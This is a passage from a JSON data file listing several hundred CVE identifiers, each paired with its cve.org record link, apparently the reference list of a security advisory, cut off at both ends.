"url": "https://www.cve.org/CVERecord?id=CVE-2023-53994"
},
{
"name": "CVE-2025-40153",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40153"
},
{
"name": "CVE-2025-40121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40121"
},
{
"name": "CVE-2025-40312",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40312"
},
{
"name": "CVE-2025-40204",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40204"
},
{
"name": "CVE-2023-54095",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54095"
},
{
"name": "CVE-2025-37841",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37841"
},
{
"name": "CVE-2025-40171",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40171"
},
{
"name": "CVE-2023-54143",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54143"
},
{
"name": "CVE-2025-68238",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68238"
},
{
"name": "CVE-2025-68297",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68297"
},
{
"name": "CVE-2023-53813",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53813"
},
{
"name": "CVE-2023-54227",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54227"
},
{
"name": "CVE-2023-53855",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53855"
},
{
"name": "CVE-2025-68804",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68804"
},
{
"name": "CVE-2025-40139",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40139"
},
{
"name": "CVE-2023-53864",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53864"
},
{
"name": "CVE-2025-40350",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40350"
},
{
"name": "CVE-2025-40309",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40309"
},
{
"name": "CVE-2025-40349",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40349"
},
{
"name": "CVE-2023-54246",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54246"
},
{
"name": "CVE-2025-71088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71088"
},
{
"name": "CVE-2025-38243",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38243"
},
{
"name": "CVE-2025-40343",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40343"
},
{
"name": "CVE-2023-54001",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54001"
},
{
"name": "CVE-2023-54253",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54253"
},
{
"name": "CVE-2025-68307",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68307"
},
{
"name": "CVE-2025-40308",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40308"
},
{
"name": "CVE-2023-54324",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54324"
},
{
"name": "CVE-2023-54106",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54106"
},
{
"name": "CVE-2025-40187",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40187"
},
{
"name": "CVE-2025-40315",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40315"
},
{
"name": "CVE-2023-53793",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53793"
},
{
"name": "CVE-2023-54096",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54096"
},
{
"name": "CVE-2025-39913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39913"
},
{
"name": "CVE-2025-71098",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71098"
},
{
"name": "CVE-2025-40251",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40251"
},
{
"name": "CVE-2025-71078",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71078"
},
{
"name": "CVE-2025-40355",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40355"
},
{
"name": "CVE-2023-54283",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54283"
},
{
"name": "CVE-2023-54049",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54049"
},
{
"name": "CVE-2025-40107",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40107"
},
{
"name": "CVE-2025-71083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71083"
},
{
"name": "CVE-2023-54066",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54066"
},
{
"name": "CVE-2025-40115",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40115"
},
{
"name": "CVE-2023-54117",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54117"
},
{
"name": "CVE-2023-53999",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53999"
},
{
"name": "CVE-2024-54031",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-54031"
},
{
"name": "CVE-2023-54038",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54038"
},
{
"name": "CVE-2025-68813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68813"
},
{
"name": "CVE-2023-54315",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54315"
},
{
"name": "CVE-2025-38521",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38521"
},
{
"name": "CVE-2025-39689",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39689"
},
{
"name": "CVE-2025-68365",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68365"
},
{
"name": "CVE-2023-54211",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54211"
},
{
"name": "CVE-2023-54251",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54251"
},
{
"name": "CVE-2025-71085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71085"
},
{
"name": "CVE-2023-54156",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54156"
},
{
"name": "CVE-2025-38547",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38547"
},
{
"name": "CVE-2023-53750",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53750"
},
{
"name": "CVE-2025-71076",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71076"
},
{
"name": "CVE-2025-40347",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40347"
},
{
"name": "CVE-2025-71154",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71154"
},
{
"name": "CVE-2023-54037",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54037"
},
{
"name": "CVE-2023-53815",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53815"
},
{
"name": "CVE-2025-40198",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40198"
},
{
"name": "CVE-2025-68257",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68257"
},
{
"name": "CVE-2025-71084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71084"
},
{
"name": "CVE-2023-54031",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54031"
},
{
"name": "CVE-2025-40173",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40173"
},
{
"name": "CVE-2025-40190",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40190"
},
{
"name": "CVE-2025-38297",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38297"
},
{
"name": "CVE-2023-53989",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53989"
},
{
"name": "CVE-2025-68347",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68347"
},
{
"name": "CVE-2025-39944",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39944"
},
{
"name": "CVE-2025-68235",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68235"
},
{
"name": "CVE-2025-68770",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68770"
},
{
"name": "CVE-2025-38538",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38538"
},
{
"name": "CVE-2025-40202",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40202"
},
{
"name": "CVE-2025-40311",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40311"
},
{
"name": "CVE-2025-68814",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68814"
},
{
"name": "CVE-2023-54254",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54254"
},
{
"name": "CVE-2025-71081",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71081"
},
{
"name": "CVE-2023-54312",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54312"
},
{
"name": "CVE-2023-54094",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54094"
},
{
"name": "CVE-2022-50700",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50700"
},
{
"name": "CVE-2025-40167",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40167"
},
{
"name": "CVE-2025-37744",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37744"
},
{
"name": "CVE-2023-53846",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53846"
},
{
"name": "CVE-2025-40194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40194"
},
{
"name": "CVE-2023-53792",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53792"
},
{
"name": "CVE-2023-54164",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54164"
},
{
"name": "CVE-2025-40256",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40256"
},
{
"name": "CVE-2025-71080",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71080"
},
{
"name": "CVE-2025-71142",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71142"
},
{
"name": "CVE-2026-22989",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22989"
},
{
"name": "CVE-2025-40360",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40360"
},
{
"name": "CVE-2025-71136",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71136"
},
{
"name": "CVE-2025-68354",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68354"
},
{
"name": "CVE-2025-68801",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68801"
},
{
"name": "CVE-2025-71073",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71073"
},
{
"name": "CVE-2023-54316",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54316"
},
{
"name": "CVE-2025-40097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40097"
},
{
"name": "CVE-2025-68258",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68258"
},
{
"name": "CVE-2023-54089",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54089"
},
{
"name": "CVE-2025-40001",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40001"
},
{
"name": "CVE-2025-38590",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38590"
},
{
"name": "CVE-2023-54016",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54016"
},
{
"name": "CVE-2023-54035",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54035"
},
{
"name": "CVE-2025-40322",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40322"
},
{
"name": "CVE-2025-68209",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68209"
},
{
"name": "CVE-2025-40045",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40045"
},
{
"name": "CVE-2025-37955",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37955"
},
{
"name": "CVE-2025-39859",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39859"
},
{
"name": "CVE-2025-71138",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71138"
},
{
"name": "CVE-2025-40233",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40233"
},
{
"name": "CVE-2023-54322",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54322"
},
{
"name": "CVE-2025-40172",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40172"
},
{
"name": "CVE-2023-54155",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54155"
},
{
"name": "CVE-2023-54088",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54088"
},
{
"name": "CVE-2025-40188",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40188"
},
{
"name": "CVE-2025-40271",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40271"
},
{
"name": "CVE-2023-54276",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54276"
},
{
"name": "CVE-2023-42752",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-42752"
},
{
"name": "CVE-2025-40186",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40186"
},
{
"name": "CVE-2026-22991",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22991"
},
{
"name": "CVE-2023-54048",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54048"
},
{
"name": "CVE-2023-54278",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54278"
},
{
"name": "CVE-2023-54215",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54215"
},
{
"name": "CVE-2025-68308",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68308"
},
{
"name": "CVE-2023-53777",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53777"
},
{
"name": "CVE-2023-54133",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54133"
},
{
"name": "CVE-2025-68822",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68822"
},
{
"name": "CVE-2025-40242",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40242"
},
{
"name": "CVE-2025-68368",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68368"
},
{
"name": "CVE-2023-54148",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54148"
},
{
"name": "CVE-2025-68190",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68190"
},
{
"name": "CVE-2023-54064",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54064"
},
{
"name": "CVE-2023-54153",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54153"
},
{
"name": "CVE-2025-40169",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40169"
},
{
"name": "CVE-2025-40252",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40252"
},
{
"name": "CVE-2023-53791",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53791"
},
{
"name": "CVE-2025-68218",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68218"
},
{
"name": "CVE-2023-53848",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53848"
},
{
"name": "CVE-2025-68255",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68255"
},
{
"name": "CVE-2023-54081",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54081"
},
{
"name": "CVE-2023-53828",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53828"
},
{
"name": "CVE-2025-39927",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39927"
},
{
"name": "CVE-2025-40024",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40024"
},
{
"name": "CVE-2025-40238",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40238"
},
{
"name": "CVE-2023-54185",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54185"
},
{
"name": "CVE-2025-40277",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40277"
},
{
"name": "CVE-2025-40070",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40070"
},
{
"name": "CVE-2025-37813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37813"
},
{
"name": "CVE-2025-38543",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38543"
},
{
"name": "CVE-2025-40106",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40106"
},
{
"name": "CVE-2025-68174",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68174"
},
{
"name": "CVE-2025-38298",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38298"
},
{
"name": "CVE-2025-40272",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40272"
},
{
"name": "CVE-2025-71093",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71093"
},
{
"name": "CVE-2025-68759",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68759"
},
{
"name": "CVE-2023-53834",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53834"
},
{
"name": "CVE-2025-40345",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40345"
},
{
"name": "CVE-2025-40205",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40205"
},
{
"name": "CVE-2023-54170",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54170"
},
{
"name": "CVE-2025-38511",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38511"
},
{
"name": "CVE-2025-38537",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38537"
},
{
"name": "CVE-2025-40033",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40033"
},
{
"name": "CVE-2024-42103",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42103"
},
{
"name": "CVE-2025-68733",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68733"
},
{
"name": "CVE-2026-23005",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23005"
},
{
"name": "CVE-2022-50253",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50253"
},
{
"name": "CVE-2025-68188",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68188"
},
{
"name": "CVE-2025-40269",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40269"
},
{
"name": "CVE-2025-68335",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68335"
},
{
"name": "CVE-2025-71079",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71079"
},
{
"name": "CVE-2023-54223",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54223"
},
{
"name": "CVE-2026-22997",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22997"
},
{
"name": "CVE-2025-40075",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40075"
},
{
"name": "CVE-2025-39977",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39977"
},
{
"name": "CVE-2023-54045",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54045"
},
{
"name": "CVE-2025-68330",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68330"
},
{
"name": "CVE-2023-54101",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54101"
},
{
"name": "CVE-2023-54179",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54179"
},
{
"name": "CVE-2025-40027",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40027"
},
{
"name": "CVE-2025-68180",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68180"
},
{
"name": "CVE-2023-54289",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54289"
},
{
"name": "CVE-2023-54177",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54177"
},
{
"name": "CVE-2025-38548",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38548"
},
{
"name": "CVE-2025-68201",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68201"
},
{
"name": "CVE-2025-40289",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40289"
},
{
"name": "CVE-2025-71143",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71143"
},
{
"name": "CVE-2025-68768",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68768"
},
{
"name": "CVE-2025-71130",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71130"
},
{
"name": "CVE-2025-38507",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38507"
},
{
"name": "CVE-2023-54013",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54013"
},
{
"name": "CVE-2025-68808",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68808"
},
{
"name": "CVE-2024-27005",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27005"
},
{
"name": "CVE-2025-38513",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38513"
},
{
"name": "CVE-2025-68783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68783"
},
{
"name": "CVE-2025-40292",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40292"
},
{
"name": "CVE-2025-71147",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71147"
},
{
"name": "CVE-2023-54093",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54093"
},
{
"name": "CVE-2023-53839",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53839"
},
{
"name": "CVE-2023-53752",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53752"
},
{
"name": "CVE-2025-68724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68724"
},
{
"name": "CVE-2023-54318",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54318"
},
{
"name": "CVE-2025-71126",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71126"
},
{
"name": "CVE-2025-68252",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68252"
},
{
"name": "CVE-2023-54166",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54166"
},
{
"name": "CVE-2025-40274",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40274"
},
{
"name": "CVE-2025-68797",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68797"
},
{
"name": "CVE-2023-54136",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54136"
},
{
"name": "CVE-2023-54225",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54225"
},
{
"name": "CVE-2025-40206",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40206"
},
{
"name": "CVE-2025-40220",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40220"
},
{
"name": "CVE-2025-68237",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68237"
},
{
"name": "CVE-2023-54194",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54194"
},
{
"name": "CVE-2025-40257",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40257"
},
{
"name": "CVE-2025-68259",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68259"
},
{
"name": "CVE-2026-23006",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23006"
},
{
"name": "CVE-2025-39788",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39788"
},
{
"name": "CVE-2025-71108",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71108"
},
{
"name": "CVE-2025-68789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68789"
},
{
"name": "CVE-2025-68312",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68312"
},
{
"name": "CVE-2023-53843",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53843"
},
{
"name": "CVE-2025-68284",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68284"
},
{
"name": "CVE-2025-68194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68194"
},
{
"name": "CVE-2025-38379",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38379"
},
{
"name": "CVE-2025-68356",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68356"
},
{
"name": "CVE-2025-40109",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40109"
},
{
"name": "CVE-2025-40006",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40006"
},
{
"name": "CVE-2023-53844",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53844"
},
{
"name": "CVE-2025-40038",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40038"
},
{
"name": "CVE-2025-68183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68183"
},
{
"name": "CVE-2025-39805",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39805"
},
{
"name": "CVE-2025-40263",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40263"
},
{
"name": "CVE-2022-50717",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50717"
},
{
"name": "CVE-2023-54026",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54026"
},
{
"name": "CVE-2025-68244",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68244"
},
{
"name": "CVE-2025-40231",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40231"
},
{
"name": "CVE-2025-40278",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40278"
},
{
"name": "CVE-2025-71157",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71157"
},
{
"name": "CVE-2025-38505",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38505"
},
{
"name": "CVE-2025-40176",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40176"
},
{
"name": "CVE-2025-40342",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40342"
},
{
"name": "CVE-2023-53858",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53858"
},
{
"name": "CVE-2023-53992",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53992"
},
{
"name": "CVE-2025-37904",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37904"
},
{
"name": "CVE-2026-22999",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22999"
},
{
"name": "CVE-2023-54266",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54266"
},
{
"name": "CVE-2025-71082",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71082"
},
{
"name": "CVE-2025-68222",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68222"
},
{
"name": "CVE-2025-68743",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68743"
},
{
"name": "CVE-2025-68765",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68765"
},
{
"name": "CVE-2023-53825",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53825"
},
{
"name": "CVE-2025-71132",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71132"
},
{
"name": "CVE-2023-54072",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54072"
},
{
"name": "CVE-2025-38322",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38322"
},
{
"name": "CVE-2023-54134",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54134"
},
{
"name": "CVE-2025-38541",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38541"
},
{
"name": "CVE-2025-71077",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71077"
},
{
"name": "CVE-2023-54291",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54291"
},
{
"name": "CVE-2025-40279",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40279"
},
{
"name": "CVE-2023-53865",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53865"
},
{
"name": "CVE-2025-68328",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68328"
},
{
"name": "CVE-2023-53823",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53823"
},
{
"name": "CVE-2023-54023",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54023"
},
{
"name": "CVE-2025-38530",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38530"
},
{
"name": "CVE-2025-71114",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71114"
},
{
"name": "CVE-2025-68348",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68348"
},
{
"name": "CVE-2025-68744",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68744"
},
{
"name": "CVE-2023-54241",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54241"
},
{
"name": "CVE-2025-68320",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68320"
},
{
"name": "CVE-2023-54017",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54017"
},
{
"name": "CVE-2025-40183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40183"
},
{
"name": "CVE-2026-22990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22990"
},
{
"name": "CVE-2025-68376",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68376"
},
{
"name": "CVE-2023-53787",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53787"
},
{
"name": "CVE-2026-23000",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23000"
},
{
"name": "CVE-2025-68172",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68172"
},
{
"name": "CVE-2024-53149",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53149"
},
{
"name": "CVE-2025-40338",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40338"
},
{
"name": "CVE-2025-68821",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68821"
},
{
"name": "CVE-2025-38589",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38589"
},
{
"name": "CVE-2025-40195",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40195"
},
{
"name": "CVE-2025-40134",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40134"
},
{
"name": "CVE-2025-68325",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68325"
},
{
"name": "CVE-2023-54154",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54154"
},
{
"name": "CVE-2025-71089",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71089"
},
{
"name": "CVE-2025-39795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39795"
},
{
"name": "CVE-2023-54141",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54141"
},
{
"name": "CVE-2023-53766",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53766"
},
{
"name": "CVE-2025-68341",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68341"
},
{
"name": "CVE-2025-68296",
